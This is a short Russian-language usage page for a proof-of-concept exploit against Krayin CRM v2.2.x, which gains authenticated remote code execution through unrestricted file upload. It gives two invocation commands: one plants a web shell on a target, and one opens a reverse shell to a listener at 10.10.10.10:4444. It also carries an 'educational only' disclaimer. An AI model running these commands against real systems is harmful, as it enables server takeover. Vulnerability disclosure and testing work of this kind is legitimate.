
Эксплойт-доказательство концепции для аутентифицированного удаленного выполнения кода в Krayin CRM v2.2.x через неограниченную загрузку файлов, поддерживающий полезные нагрузки web shell и reverse shell.
PoC-скрипт критической уязвимости в Krayin CRM v2.2.x, позволяющий выполнение аутентифицированного RCE через неограниченную загрузку файлов.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
Только для образовательных целей.